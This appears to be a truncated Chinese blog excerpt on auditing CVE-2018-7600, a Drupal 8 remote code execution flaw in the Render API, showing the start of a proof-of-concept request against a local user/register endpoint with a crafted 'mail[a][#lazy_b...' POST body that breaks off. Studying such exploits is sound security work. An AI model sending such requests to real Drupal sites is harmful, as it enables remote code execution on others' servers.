代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API

  今天学习一下Drupal的另外一个漏洞,因为渲染数组不当形成的漏洞php   poc:html url: http://localhost/drupal-8.5.0/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax post: 'mail[a][#lazy_b
相关文章
相关标签/搜索